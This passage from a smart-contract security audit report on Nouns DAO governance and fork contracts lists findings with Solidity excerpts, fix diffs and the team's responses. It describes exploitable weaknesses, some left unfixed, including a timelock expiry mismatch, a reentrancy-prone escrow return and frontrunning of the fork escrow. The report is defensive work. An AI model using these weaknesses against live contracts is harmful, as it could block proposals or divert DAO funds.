The consequence of this scenario is that it essentially blocks or causes a Denial of Service to the legitimate execution path of the corresponding proposal for either timelockV1 or timelock. This occurs because each proposal has been inadvertently executed on the unintended timelock contract due to the lack of a condition check that would otherwise ensure the correct execution path.

Recommendation: Consider adding a require that checks the executeOnTimelockV1 flag in both functions.

Nouns: The risk presented is very unlikely. Hence, leaving as is, won't fix.

Spearbit: Acknowledged.

+5.3.21 Due to misaligned DAO and Executors logic any proposal will be blocked from execution at the 'eta + GRACE_PERIOD' timestamp

Severity: Low Risk

Context: NounsDAOLogicV2.sol#L455-L473, NounsDAOV3Proposals.sol#L625-L652, NounsDAOLogicV1Fork.sol#L477-L493

Description: There is an inconsistency in the treatment of the eta + GRACE_PERIOD moment of time in the proposal lifecycle: any proposal is executable in the timelock at this timestamp, but has expired status in the DAO logic.

Both Executors do allow executions when block.timestamp == eta + GRACE_PERIOD.

The NounsDAOExecutor:executeTransaction() function:

function executeTransaction(
    address target,
    uint256 value,
    string memory signature,
    bytes memory data,
    uint256 eta
) public returns (bytes memory) {
    ...
    require(
        getBlockTimestamp() >= eta,
        "NounsDAOExecutor::executeTransaction: Transaction hasn't surpassed time lock."
    );
    require(
        getBlockTimestamp() <= eta + GRACE_PERIOD,
        'NounsDAOExecutor::executeTransaction: Transaction is stale.'
    );

The NounsDAOExecutorV2:executeTransaction() function:

function executeTransaction(
    address target,
    uint256 value,
    string memory signature,
    bytes memory data,
    uint256 eta
) public returns (bytes memory) {
    ...
    require(
        getBlockTimestamp() >= eta,
        "NounsDAOExecutor::executeTransaction: Transaction hasn't surpassed time lock."
    );
    require(
        getBlockTimestamp() <= eta + GRACE_PERIOD,
        'NounsDAOExecutor::executeTransaction: Transaction is stale.'
    );

While all (V1, V2, V3, and V1Fork) DAO state functions produce the expired state.

The NounsDAOLogicV2:state() function:

function state(uint256 proposalId) public view returns (ProposalState) {
    require(proposalCount >= proposalId, 'NounsDAO::state: invalid proposal id');
    Proposal storage proposal = _proposals[proposalId];
    if (proposal.vetoed) {
        return ProposalState.Vetoed;
    } else if (proposal.canceled) {
        return ProposalState.Canceled;
    } else if (block.number <= proposal.startBlock) {
        return ProposalState.Pending;
    } else if (block.number <= proposal.endBlock) {
        return ProposalState.Active;
    } else if (proposal.forVotes <= proposal.againstVotes || proposal.forVotes < quorumVotes(proposal.id)) {
        return ProposalState.Defeated;
    } else if (proposal.eta == 0) {
        return ProposalState.Succeeded;
    } else if (proposal.executed) {
        return ProposalState.Executed;
>>  } else if (block.timestamp >= proposal.eta + timelock.GRACE_PERIOD()) {
        return ProposalState.Expired;

The NounsDAOV3Proposals:stateInternal() function:

function stateInternal(NounsDAOStorageV3.StorageV3 storage ds, uint256 proposalId)
    internal
    view
    returns (NounsDAOStorageV3.ProposalState)
{
    require(ds.proposalCount >= proposalId, 'NounsDAO::state: invalid proposal id');
    NounsDAOStorageV3.Proposal storage proposal = ds._proposals[proposalId];
    if (proposal.vetoed) {
        return NounsDAOStorageV3.ProposalState.Vetoed;
    } else if (proposal.canceled) {
        return NounsDAOStorageV3.ProposalState.Canceled;
    } else if (block.number <= proposal.updatePeriodEndBlock) {
        return NounsDAOStorageV3.ProposalState.Updatable;
    } else if (block.number <= proposal.startBlock) {
        return NounsDAOStorageV3.ProposalState.Pending;
    } else if (block.number <= proposal.endBlock) {
        return NounsDAOStorageV3.ProposalState.Active;
    } else if (block.number <= proposal.objectionPeriodEndBlock) {
        return NounsDAOStorageV3.ProposalState.ObjectionPeriod;
    } else if (isDefeated(ds, proposal)) {
        return NounsDAOStorageV3.ProposalState.Defeated;
    } else if (proposal.eta == 0) {
        return NounsDAOStorageV3.ProposalState.Succeeded;
    } else if (proposal.executed) {
        return NounsDAOStorageV3.ProposalState.Executed;
>>  } else if (block.timestamp >= proposal.eta + getProposalTimelock(ds, proposal).GRACE_PERIOD()) {
        return NounsDAOStorageV3.ProposalState.Expired;

The NounsDAOLogicV1Fork:state() function:

function state(uint256 proposalId) public view returns (ProposalState) {
    require(proposalCount >= proposalId, 'NounsDAO::state: invalid proposal id');
    Proposal storage proposal = _proposals[proposalId];
    if (proposal.canceled) {
        return ProposalState.Canceled;
    } else if (block.number <= proposal.startBlock) {
        return ProposalState.Pending;
    } else if (block.number <= proposal.endBlock) {
        return ProposalState.Active;
    } else if (proposal.forVotes <= proposal.againstVotes || proposal.forVotes < proposal.quorumVotes) {
        return ProposalState.Defeated;
    } else if (proposal.eta == 0) {
        return ProposalState.Succeeded;
    } else if (proposal.executed) {
        return ProposalState.Executed;
>>  } else if (block.timestamp >= proposal.eta + timelock.GRACE_PERIOD()) {
        return ProposalState.Expired;

Impact: Since both timelocks require the sender to be the admin, the valid proposal will be blocked from execution and forced to be expired when the execution call time happens to be exactly proposal.eta + getProposalTimelock(ds, proposal).GRACE_PERIOD(). The probability of this exact timestamp being reached is low, while the impact of a successful proposal being rendered invalid is by itself high. However, since there is enough time prior to that moment both for cancellation and execution, and all these actions come through a permissioned workflow, the impact is better described as medium; so, per low probability and medium impact, setting the severity to be low.

Recommendation: As the eta timestamp is included, consider if (block.timestamp > proposal.eta + GRACE_PERIOD) then {return Expired;} kind of logic in all state functions:

At NounsDAOLogicV2:state():

  function state(uint256 proposalId) public view returns (ProposalState) {
      ...
          return ProposalState.Executed;
-     } else if (block.timestamp >= proposal.eta + timelock.GRACE_PERIOD()) {
+     } else if (block.timestamp > proposal.eta + timelock.GRACE_PERIOD()) {
          return ProposalState.Expired;

At NounsDAOV3Proposals:stateInternal():

  function stateInternal(NounsDAOStorageV3.StorageV3 storage ds, uint256 proposalId)
      internal
      view
      returns (NounsDAOStorageV3.ProposalState)
  {
      ...
          return NounsDAOStorageV3.ProposalState.Executed;
-     } else if (block.timestamp >= proposal.eta + getProposalTimelock(ds, proposal).GRACE_PERIOD()) {
+     } else if (block.timestamp > proposal.eta + getProposalTimelock(ds, proposal).GRACE_PERIOD()) {
          return NounsDAOStorageV3.ProposalState.Expired;

At NounsDAOLogicV1Fork:state():

  function state(uint256 proposalId) public view returns (ProposalState) {
      ...
          return ProposalState.Executed;
-     } else if (block.timestamp >= proposal.eta + timelock.GRACE_PERIOD()) {
+     } else if (block.timestamp > proposal.eta + timelock.GRACE_PERIOD()) {
          return ProposalState.Expired;

Nouns: We consider this issue to be very low severity since it effectively just shortens the time a proposal can be queued by 1 second. We will not fix it at this time.

Spearbit: In addition to that, the impact also is that at the eta + timelock.GRACE_PERIOD timestamp any proposal will not be cancellable, but this proposal's transactions will be executable by a direct call to NounsDAOExecutorV2's executeTransaction(). Acknowledged.

+5.3.22 A malicious DAO can increase the odds of proposal defeat by setting a very high value of lastMinuteWindowInBlocks

Severity: Low Risk

Context: NounsDAOV3Admin.sol#L219-L227, NounsDAOV3Votes.sol#L229-L257

Description: The goal of the objection-only period, as documented, is to protect the DAO from executing proposals that the majority would not want to execute. However, a malicious majority can abuse this feature by setting a very high value of lastMinuteWindowInBlocks (the setter does not enforce a max threshold), i.e. something very close to the voting period, to increase the probability of triggering the objection-only period.

Example scenario: If votingPeriod = 2 weeks and a governance proposal somehow passed to set lastMinuteWindowInBlocks to a value very close to 100800 blocks, i.e. ~2 weeks, then every proposal may end up with an objection-only period.

Impact: Every proposal may end up with an objection-only period which may not be required/expected. Low likelihood + Low impact = Low severity.

Recommendation: Consider implementing a max threshold for lastMinuteWindowInBlocks, preferably as a percentage value, say 70%, of the votingPeriod, which would make any triggering of the objection period meaningful. This is because switching of the proposal state from defeated to successful in the initial phase of the voting period may not mean much.

Nouns: We still see it as a feature to be able to set it to the entire voting period. Won't fix.

Spearbit: Our take here is that during the initial part of the voting period this trigger is more a bug than a feature. Switching from Defeated to Successful brings in no information when voting has just started. Acknowledged.

5.4 Gas Optimization

+5.4.1 Use custom errors instead of revert strings and remove pre-existing unused custom errors

Severity: Gas Optimization

Context: NounsDAOProxy.sol#L79, NounsDAOExecutorV2.sol#L108, NounsDAOExecutor.sol#L134, NounsDAOLogicV1Fork.sol#L680, NounsTokenFork.sol#L43

Description: String errors are added to the bytecode, which makes deployment more expensive.
It is also difficult to use dynamic information in them. Custom errors are more convenient and gas-efficient. There are several cases across the codebase where long string errors are still used over custom errors. As an example, in NounsDAOLogicV1Fork.sol#L680, the check reverts with a string:

require(msg.sender == admin, 'NounsDAO::_setQuorumVotesBPS: admin only');

In this case, the AdminOnly() custom error can be used here to save gas (a minimal sketch appears at the end of this section). This also occurs in other parts of this contract as well as the codebase. Also, some custom errors were defined but not used. See NounsTokenFork.sol#L40, NounsTokenFork.sol#L43.

Recommendation: It is worth using custom errors over string errors as this will save gas. Review and update the codebase with custom errors where convenient. Also, remove any unused custom errors.

Nouns: Won't Fix. We do benefit from the current design, e.g. by being able to run the same test code on multiple DAO versions.

Spearbit: Acknowledged.

+5.4.2 escrowedTokensByForkId can be used to get the owner of escrowed tokens

Severity: Gas Optimization

Context: NounsDAOForkEscrow.sol#L58

Description: The state variable escrowedTokensByForkId in L58 creates a getter function that can be used to check the owner of an escrowed token. This performs the same function as calling ownerOfEscrowedToken() and might be considered redundant.

Recommendation: Consider removing the function ownerOfEscrowedToken() to reduce code size and deployment cost.

Nouns: Won't Fix. The deployment gas savings aren't important enough right now.

Spearbit: Acknowledged.

+5.4.3 Emit events using locally assigned variables instead of reading from storage to save on SLOAD

Severity: Gas Optimization

Context: NounsDAOV3Admin.sol#L284, NounsDAOLogicV1Fork.sol#L619, NounsDAOExecutorV2.sol#L104, NounsDAOProxy.sol#L85

Description: By emitting local variables over storage variables, when they have the same value, you can save gas on SLOAD. Some examples include:

NounsDAOLogicV1Fork.sol#L619:

- emit VotingDelaySet(oldVotingDelay, votingDelay);
+ emit VotingDelaySet(oldVotingDelay, newVotingDelay);

NounsDAOLogicV1Fork.sol#L635:

- emit VotingPeriodSet(oldVotingPeriod, votingPeriod);
+ emit VotingPeriodSet(oldVotingPeriod, newVotingPeriod);

NounsDAOLogicV1Fork.sol#L653:

- emit ProposalThresholdBPSSet(oldProposalThresholdBPS, proposalThresholdBPS);
+ emit ProposalThresholdBPSSet(oldProposalThresholdBPS, newProposalThresholdBPS);

NounsDAOLogicV1Fork.sol#L670:

- emit QuorumVotesBPSSet(oldQuorumVotesBPS, quorumVotesBPS);
+ emit QuorumVotesBPSSet(oldQuorumVotesBPS, newQuorumVotesBPS);

NounsDAOExecutorV2.sol#L104:

- emit NewDelay(delay);
+ emit NewDelay(delay_);

NounsDAOExecutorV2.sol#L112:

- emit NewAdmin(admin);
+ emit NewAdmin(msg.sender);

NounsDAOExecutorV2.sol#L122:

- emit NewPendingAdmin(pendingAdmin);
+ emit NewPendingAdmin(pendingAdmin_);

NounsDAOV3Admin.sol#L284:

- emit NewPendingAdmin(oldPendingAdmin, ds.pendingAdmin);
+ emit NewPendingAdmin(oldPendingAdmin, address(0));

NounsDAOProxy.sol#L85:

- emit NewImplementation(oldImplementation, implementation);
+ emit NewImplementation(oldImplementation, implementation_);

Recommendation: Review the codebase and consider using the existing local values instead of reading from storage when emitting events. This will save some gas since it will avoid usage of the SLOAD opcode.

Nouns: Fix PR: nounsDAO/nouns-monorepo#736.

Spearbit: Fixed.
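To make the custom-error suggestion in 5.4.1 concrete, a minimal sketch follows (hedged; it assumes the AdminOnly() error is already declared in the contract, as the report indicates, and shows only the rewritten check):

// Sketch: the string-based admin check from NounsDAOLogicV1Fork.sol#L680 rewritten
// with the existing AdminOnly() custom error; the long revert string no longer
// needs to be stored in the deployed bytecode.
if (msg.sender != admin) revert AdminOnly();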
5.5 Informational

+5.5.1 joinFork() violates the Checks-Effects-Interactions best practice for reentrancy mitigation

Severity: Informational

Context: NounsDAOV3Fork.sol#L139-L158

Description: joinFork() interacts with forkDAOTreasury in sendProRataTreasury() to send the pro rata original DAO treasury for the tokens joining the fork. This interaction with the external forkDAOTreasury contract happens before the transfer of the original DAO tokens to the timelock is effected. While forkDAOTreasury is under the control of the fork DAO (outside the trust model of the original DAO) and joinFork() does not have a reentrancy guard, we do not see a potential/meaningful exploitable reentrancy here.

Recommendation: Implement the Checks-Effects-Interactions best practice by transferring the original tokens to the timelock before sending its proportional treasury from the original DAO to the fork DAO.

Nouns: Won't Fix. Risk is too low.

Spearbit: Acknowledged.

+5.5.2 Rename MAX_VOTING_PERIOD and MAX_VOTING_DELAY to enhance readability

Severity: Informational

Context: NounsDAOV3Admin.sol#L115, NounsDAOV3Admin.sol#L121

Description: Given that the state variables MAX_VOTING_PERIOD (NounsDAOV3Admin.sol#L115) and MAX_VOTING_DELAY (NounsDAOV3Admin.sol#L121) are in blocks, it is more readable if the name has a _BLOCKS suffix and is set to 2 weeks / 12, as done with MAX_OBJECTION_PERIOD_BLOCKS and MAX_UPDATABLE_PERIOD_BLOCKS. The functions _setVotingDelay (L152) and _setVotingPeriod (L167) can be renamed in the same vein by adding an -InBlocks suffix, similar to _setObjectionPeriodDurationInBlocks and other functions.

In addition to this, constants should be named with all capital letters with underscores separating words, following the Solidity style guide. For example, proposalMaxOperations in NounsDAOV3Proposals.sol#L138 can be renamed.

Recommendation: Implement changes in MAX_VOTING_PERIOD and MAX_VOTING_DELAY to enhance readability. Rename proposalMaxOperations to follow the style guide for constants.

Nouns: Ack, fix PR: PR 728 and commit 6d4388.

Spearbit: Fixed.

+5.5.3 External function is used instead of internal equivalent across NounsDAOV3Proposals logic

Severity: Informational

Context: NounsDAOV3Proposals.sol#L389

Description: The public view state(ds, proposalId) is used instead of the fully equivalent internal stateInternal(ds, proposalId) in several occurrences of the NounsDAOV3Proposals logic. For example, in NounsDAOV3Proposals:updateProposalBySigs, state(ds, proposalId) is used instead of the stateInternal function:

if (state(ds, proposalId) != NounsDAOStorageV3.ProposalState.Updatable) revert CanOnlyEditUpdatableProposals();

Recommendation: It is recommended to use stateInternal(ds, proposalId) instead of the public state(ds, proposalId) function.

Nouns: Fix PR: nounsDAO/nouns-monorepo#729.

Spearbit: Fix looks good.

+5.5.4 Proposals created through proposeBySigs() can not be executed on TimelockV1

Severity: Informational

Context: NounsDAOV3Proposals.sol#L204

Description: Currently, proposals created through the proposeBySigs() function can not be executed on TimelockV1. This could potentially limit the flexibility of creating different types of proposals. It may be advantageous to have a parameter added to the proposeBySigs() function, allowing the proposer to decide whether the proposal should be executed on TimelockV1 or not.
There's a design decision to be made regarding whether this value should be incorporated as part of the signers' signature, or simply left up to the proposer to determine if execution should happen on TimelockV1 or not. Recommendation: Consider modifying the function by adding a parameter for the execution location decision. This could be part of the signer's signature or be at the proposer's discretion. Nouns: Acknowledged, won't fix. Spearbit: Acknowledged.

+5.5.5 escrowToFork() can be frontrun to prevent users from joining the fork during the escrow period Severity: Informational Context: NounsDAOV3Fork.sol#L72-L86, NounsDAOV3Fork.sol#L109-L130 Description: escrowToFork() could be frontrun by another user and made to revert by either: 1. Frontrunning with another escrowToFork() that reaches the fork threshold + executeFork(). 2. If the fork threshold was already reached, frontrunning with executeFork(). This forces the escrowing user to join the fork only during the forking period. Recommendation: Consider a delay period between the escrow and forking periods so that executeFork() is a time-based trigger instead of relying only on the threshold. Nouns: Thank you, we won't fix this one. Spearbit: Acknowledged.

+5.5.6 Fork spec says Nouns are escrowed during the fork active period Severity: Informational Context: Fork-Spec Description: The Fork-Spec says: "During the forking period additional forking Nouns are also sent to the escrow contract; the motivation is to have a clean separation between fork-related Nouns and Nouns owned by the DAO for other reasons." However, the implementation sends such Nouns to the original DAO treasury. Recommendation: Update the spec to reflect the current implementation. Nouns: Spec is updated. Spearbit: This has been updated in the latest spec commit.

+5.5.7 Known issues from previous versions/audit Severity: Informational Context: Audit-Report Note Description: Below are some of the known issues from previous versions as reported by the protocol team, documented in the audit report and recorded here verbatim for reporting purposes. Note: All issues reported earlier and not fixed in the current version(s) of the audit scope are assumed to be acknowledged without fixing. NounsToken delegateBySigs allows delegating to address zero: We've fixed this issue in the fork token contract, but cannot fix it in the original NounsToken because the contract isn't upgradeable. Voting gas refund can be abused: We're aware of different ways of abusing this function: A token holder could delegate their Nouns to a contract and vote on multiple proposals in a loop, such that the tx gas overhead is amortized across all votes, while the refund function assumes each vote has the full overhead to bear; this could result in token holders profiting from gas refunds. A token holder could grief the DAO by voting with very long reason strings, in order to drain the refund balance faster. We find these issues low risk and unlikely given the small size of the community, and the low ETH balance the governor contract has to spend on refunds. Should we see such abusive activity, we might reconsider this feature. Nouns transfers will stop working when block number hits uint32 max value: We're aware of this issue. It means the Nouns token will stop functioning a long long long time from now :) AuctionHouse has an open gas griefing vector: Bidder Alice can bid from a smart contract that returns a large byte array when receiving ETH.
Then if Bob outbids Alice, in his bid tx AuctionHouse refunds Alice, and the large return value causes a gas cost spike for Bob. See more details here. We're planning to fix this in the next AuctionHouse version; its launch date is unknown at this point. Using error strings instead of custom errors: In all new code we're using custom errors. In code that's forked from previous versions we optimized for the smallest diff possible, and so are leaving error strings untouched. Recommendation: Nouns: Acknowledged. Spearbit: Acknowledged.

+5.5.8 When a minority forks, the majority can follow Severity: Informational Context: When a minority forks, the majority can follow Description: This is a known issue as documented by the protocol team and is being recorded here verbatim for reporting purposes. For example, a malicious majority can vote For a proposal to drain the treasury, forcing others to fork; the majority can then join the fork with many of their tokens, benefiting from the passing proposal on the original DAO, while continuing to attack the minority in their new fork DAO, forcing them to quit the fork DAO. This is a well known flaw of the current fork design, something we've chosen to go live with for the sake of shipping something the DAO has asked for urgently. Recommendation: Consider a redesign which mitigates this issue in a future iteration. Nouns: Acknowledged. Spearbit: Acknowledged.

+5.5.9 The original DAO can temporarily brick a fork DAO's token minting Severity: Informational Context: The-original-DAO-can-temporarily-brick-a-fork-DAO's-token-minting Description: This is a known issue as documented by the protocol team and is being recorded here verbatim for reporting purposes. We've decided in this version to deploy fork DAOs such that fork tokens reuse the same descriptor contract as the original DAO's token descriptor. Our motivations are minimizing lines of code and the gas cost of deploying a fork. This design poses a risk on fork tokens: the original DAO can update the descriptor to use a new art contract that always reverts, which would then lead to the fork token's mint function always reverting. The solution would be for the fork DAO to execute a proposal that deploys and sets a new descriptor on its token, which would use a valid art contract, allowing minting to resume. The fork DAO is guaranteed to be able to propose and execute such a proposal, because the function where Nouners claim their fork tokens does not use the descriptor, and so is not vulnerable to this attack. Recommendation: Ensure that the forking UI/UX provides guidance on this aspect. Nouns: Acknowledged. Spearbit: Acknowledged.

+5.5.10 Unused events, missing events and unindexed event parameters in contracts Severity: Informational Context: INounsTokenFork.sol#L29, NounsDAOV3Admin.sol#L509-514, NounsDAOEventsFork.sol#L43 Description: Some contracts have missing or unused events, as well as event parameters that are unindexed. As examples: 1. Unused events: INounsTokenFork.sol#L29: event NoundersDAOUpdated(address noundersDAO); 2. Missing events: NounsDAOV3Admin.sol#L509-514: Missing an event as in _setForkEscrow 3. Unindexed parameters: NounsDAOEventsFork.sol: Many parameters can be indexed here. Recommendation: Review the codebase, remove unused events, add missing events and index event parameters where necessary. Nouns: Fix PR: nounsDAO/nouns-monorepo#730. Spearbit: Fixed.
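To illustrate the indexing recommendation, a minimal hypothetical before/after sketch (these event definitions are illustrative, not the actual NounsDAOEventsFork declarations):

interface IEscrowEventsBefore {
    // Before: consumers cannot filter logs by owner or fork.
    event Escrowed(address owner, uint32 forkId, uint256 tokenId);
}

interface IEscrowEventsAfter {
    // After: indexed topics allow off-chain log filtering by owner and
    // forkId (at most three parameters per event may be indexed).
    event Escrowed(address indexed owner, uint32 indexed forkId, uint256 tokenId);
}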
+5.5.11 Prefer using __Ownable_init instead of _transferOwnership to initialize upgradable contracts Severity: Informational Context: NounsAuctionHouseFork.sol#L87, NounsTokenFork.sol#L129 Description: The upgradable NounsAuctionHouseFork and NounsTokenFork contracts inherit the OwnableUpgradeable contract. However, inside the initialize function the ownership transfer is performed by calling the internal _transferOwnership function instead of calling __Ownable_init. This deviates from the standard approach of initializing upgradable contracts, and it can lead to issues if the OwnableUpgradeable contract changes its initialization mechanism. Recommendation: It is recommended to use the __Ownable_init function instead of _transferOwnership to initialize the mentioned contracts. Nouns: Won't Fix. We're still using an older OZ version without the ability to set a custom owner in the init function. Upgrading our OZ version is out of scope in this release. Spearbit: Acknowledged.

+5.5.12 Consider emitting the address of the timelock in the ProposalQueued event Severity: Informational Context: NounsDAOV3Proposals.sol#L448 Description: The queue function currently emits the ProposalQueued event to provide relevant information about the proposal, including the proposalId and the eta. However, it doesn't emit the timelock variable, which represents the address of the timelock responsible for executing the proposal. This could lead to confusion among users regarding the intended timelock for proposal execution. Recommendation: To address this issue, it is recommended to include the address of the timelock in the ProposalQueued event as well. This improvement will enhance the clarity and usability of the emitted event. Nouns: We won't change the ProposalQueued event at this time to maintain backwards compatibility with Governor Bravo clients. We'll use the ProposalCreatedOnTimelockV1 event for this purpose during creation time. Spearbit: Acknowledged.

+5.5.13 Use IERC20Upgradeable/IERC721Upgradeable for consistency with other contracts Severity: Informational Context: NounsAuctionHouseFork.sol#L35, NounsDAOLogicV1Fork.sol#L102, NounsTokenFork.sol#L25 Description: Most contracts/libraries imported and used are the upgradeable variant, e.g. OwnableUpgradeable. IERC20 and IERC721 are used, which is inconsistent with the other contracts/libraries. Since the project is deployed with upgradeability features, it is preferable to use the Upgradeable variant of OpenZeppelin Contracts. Recommendation: Use the IERC20Upgradeable or IERC721Upgradeable version where applicable in the codebase to be consistent with other upgradeable contracts/libraries. Nouns: Won't Fix. Spearbit: Acknowledged.

+5.5.14 Specification says "Pending" state instead of "Updatable" Severity: Informational Context: nouns-dao-v3-spec Description: The V3 spec says the following for "Proposal editing": "The proposer account of a proposal in the PENDING state can call an updateProposal function, providing the new complete set of transactions to execute, as well as a complete new version of the proposal description text." This is incorrect because editing can only happen in the "Updatable" state, which is just before the "Pending" state. Recommendation: Fix the specification document to say: "The proposer account of a proposal in the UPDATABLE state can call an updateProposal function...". Consider adding more details in the specification corresponding to what's been implemented. Nouns: Fixed.
Spearbit: Verified that the spec has been updated as per the recommendation.

+5.5.15 Typos, comments and descriptions need to be updated Severity: Informational Context: NounsDAOExecutorProxy.sol#L24, NounsTokenFork.sol#L66, NounsDAOV3DynamicQuorum.sol#L124, NounsDAOStorageV1Fork.sol#L33, NounsDAOLogicV3.sol#L902, NounsDAOLogicV1Fork.sol#L48, NounsDAOLogicV1Fork.sol#L80, NounsDAOV3Votes.sol#L267, NounsDAOV3Admin.sol#L130 Description: The contract source code contains several typographical errors and misaligned comments/descriptions. Typos: 1. NounsDAOLogicV1Fork.sol#L48: adjutedTotalSupply should be adjustedTotalSupply 2. NounsDAOLogicV1Fork.sol#L80: veteor should be vetoer 3. NounsDAOV3Votes.sol#L267: objetion should be objection 4. NounsDAOExecutorProxy.sol#L24: imlemenation should be implementation Comment discrepancies: 1. NounsDAOV3Admin.sol#L130: Should say // 6,000 basis points or 60% and not 4,000 2. NounsDAOV3Votes.sol#L219: change string 'NounsDAO::castVoteInternal: voter already voted' to 'NounsDAO::castVoteDuringVotingPeriodInternal: voter already voted' 3. NounsDAOExecutorV2.sol#L209: change string 'NounsDAOExecutor::executeTransaction: Call must come from admin.' to 'NounsDAOExecutor::sendETH: Call must come from admin.' 4. NounsDAOExecutorV2.sol#L221: change string 'NounsDAOExecutor::executeTransaction: Call must come from admin.' to 'NounsDAOExecutor::sendERC20: Call must come from admin.' 5. NounsDAOV3DynamicQuorum.sol#L124: Should be adjusted total supply 6. NounsDAOV3DynamicQuorum.sol#L135: Should be adjusted total supply 7. NounsDAOLogicV3.sol#L902: Adjusted supply is used for minQuorumVotes() 8. NounsDAOLogicV3.sol#L909: Adjusted supply is used for maxQuorumVotes() 9. NounsDAOStorageV1Fork.sol#L33: proposalThresholdBPS is required to be exceeded; say when it is zero, one noun is needed to propose 10. NounsTokenFork.sol#L66: Typo, to be after which Recommendation: It is recommended to fix the typographical errors and update the comments to align with the implementation. You might consider utilizing a tool such as codespell to aid in the identification of misspelled words within the source code. Nouns: Fix PR: nounsDAO/nouns-monorepo#731. Spearbit: Fixed.

+5.5.16 Contracts are not using the _disableInitializers function Severity: Informational Context: NounsDAOExecutorV2.sol#L46, NounsAuctionHouseFork.sol#L84, NounsTokenFork.sol#L127 Description: Several Nouns DAO contracts utilize the Initializable module provided by OpenZeppelin. To ensure that an implementation contract is not left uninitialized, it is recommended in OpenZeppelin's documentation to include the _disableInitializers function in the constructor. The _disableInitializers function automatically locks the contracts upon deployment. According to the OpenZeppelin documentation: "Do not leave an implementation contract uninitialized. An uninitialized implementation contract can be taken over by an attacker, which may impact the proxy. To prevent the implementation contract from being used, you should invoke the _disableInitializers function in the constructor to automatically lock it when it is deployed." Recommendation: It is recommended to add the _disableInitializers function in the constructor of the upgradeable contracts. Nouns: Won't Fix. We're still using an older OZ version without this feature. Upgrading our OZ version is out of scope in this release. Spearbit: Acknowledged.
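For reference, on OpenZeppelin versions that ship the feature (4.4.2 and later), the documented pattern looks like the following sketch (hypothetical contract name):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import { Initializable } from "@openzeppelin/contracts-upgradeable/proxy/utils/Initializable.sol";

contract LockedImplementation is Initializable {
    /// @custom:oz-upgrades-unsafe-allow constructor
    constructor() {
        // Locks the implementation so initialize() can only ever run
        // through a proxy, never on the implementation contract itself.
        _disableInitializers();
    }

    function initialize() external initializer {
        // proxy-side initialization goes here
    }
}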
+5.5.17 Missing or incomplete NatSpec documentation Severity: Informational Context: NounsDAOV3Fork.sol#L203, NounsDAOV3Votes.sol#L295, NounsDAOV3Admin.sol, NounsDAOV3Proposals.sol, NounsDAOExecutor.sol, NounsDAOExecutorV2.sol, NounsTokenFork.sol, NounsDAOLogicV3.sol Description: There are several instances throughout the codebase where NatSpec is either missing or incomplete. 1. Missing NatSpec (some functions in this case are missing a NatSpec comment): • NounsDAOV3Fork.sol#L203 • NounsDAOV3Votes.sol#L295 • NounsDAOV3Admin.sol • NounsDAOV3Proposals.sol • NounsDAOExecutor.sol • NounsDAOExecutorV2.sol 2. Incomplete NatSpec (some functions are missing the @param tag): • NounsTokenFork.sol • NounsDAOV3Admin.sol • NounsDAOV3Proposals.sol • NounsDAOLogicV3.sol Recommendation: Consider reviewing the codebase for missing or incomplete NatSpec comments and parameter tags. Add them where appropriate. Nouns: We made some fixes for things we found. Since not all cases were listed we were not able to fix everything. Here are a few: • PR 737. • PR 731. Spearbit: Acknowledged.

+5.5.18 Function ordering does not follow the Solidity style guide Severity: Informational Context: ERC721CheckpointableUpgradeable.sol#L50, NounsDAOExecutorV2.sol#L46 Description: The recommended order of functions in Solidity, as outlined in the Solidity style guide, is as follows: constructor(), receive(), fallback(), external, public, internal and private. However, this ordering isn't enforced across the Nouns DAO codebase. Recommendation: It is recommended to follow the recommended order of functions in Solidity, as outlined in the Solidity style guide. Nouns: We won't fix this one. Spearbit: Acknowledged.

+5.5.19 Use a more recent Solidity version Severity: Informational Context: ERC721CheckpointableUpgradeable.sol#L46, NounsDAOExecutorV2.sol#L40, NounsDAOLogicV3.sol#L56, NounsDAOV3Votes.sol#L18 Description: The compiler version used (0.8.6) is quite old (the current version is 0.8.20). This version was released almost two years ago and there have been five applicable bug fixes to this version since then. While it seems that those bugs don't apply to the Nouns DAO codebase, it is advised to update the compiler to a newer version. Recommendation: It is recommended to upgrade the codebase to a more recent compiler version. Nouns: We upgraded the solidity version to 0.8.19 in the following PR 724. Spearbit: Fix looks good. The project now uses solidity version 0.8.19.

+5.5.20 State modifications after external interactions make NounsDAOForkEscrow's returnTokensToOwner prone to reentrancy attacks Severity: Informational Context: NounsDAOForkEscrow.sol#L110-L125 Description: The external NFT call happens before the numTokensInEscrow update in returnTokensToOwner(). This looks safe (the NFT is fixed to be the noun contract and transferFrom() is used instead of the safe version, and also numTokensInEscrow = 0 in closeEscrow() acts as a control for the numTokensInEscrow -= tokenIds.length logic), but in general this type of execution flow structuring could allow for direct stealing via reentrancy. I.e. in the presence of a callback (e.g.
an arbitrary NFT instead of the noun contract, or safeTransferFrom instead of transferFrom) and without numTokensInEscrow = 0 conflicting with numTokensInEscrow -= tokenIds.length, as an abstract example, an attacker could add the last needed noun for forking, then call withdrawFromForkEscrow() and then, being in returnTokensToOwner(), call executeFork() from the callback hook, successfully performing the fork while having already withdrawn the NFT that belongs to the DAO.

• NounsDAOForkEscrow.sol#L110-L125:

function returnTokensToOwner(address owner, uint256[] calldata tokenIds) external onlyDAO {
    for (uint256 i = 0; i < tokenIds.length; i++) {
        if (currentOwnerOf(tokenIds[i]) != owner) revert NotOwner();
>>      nounsToken.transferFrom(address(this), owner, tokenIds[i]);
        escrowedTokensByForkId[forkId][tokenIds[i]] = address(0);
    }
    numTokensInEscrow -= tokenIds.length;
}

• NounsDAOV3Fork.sol#L109-L130:

function executeFork(NounsDAOStorageV3.StorageV3 storage ds) external returns (address forkTreasury, address forkToken) {
    if (isForkPeriodActive(ds)) revert ForkPeriodActive();
    INounsDAOForkEscrow forkEscrow = ds.forkEscrow;
>>  uint256 tokensInEscrow = forkEscrow.numTokensInEscrow();
    if (tokensInEscrow <= forkThreshold(ds)) revert ForkThresholdNotMet();
    uint256 forkEndTimestamp = block.timestamp + ds.forkPeriod;
    (forkTreasury, forkToken) = ds.forkDAODeployer.deployForkDAO(forkEndTimestamp, forkEscrow);
    sendProRataTreasury(ds, forkTreasury, tokensInEscrow, adjustedTotalSupply(ds));
    uint32 forkId = forkEscrow.closeEscrow();
    ds.forkDAOTreasury = forkTreasury;
    ds.forkDAOToken = forkToken;
    ds.forkEndTimestamp = forkEndTimestamp;
    emit ExecuteFork(forkId, forkTreasury, forkToken, forkEndTimestamp, tokensInEscrow);
}

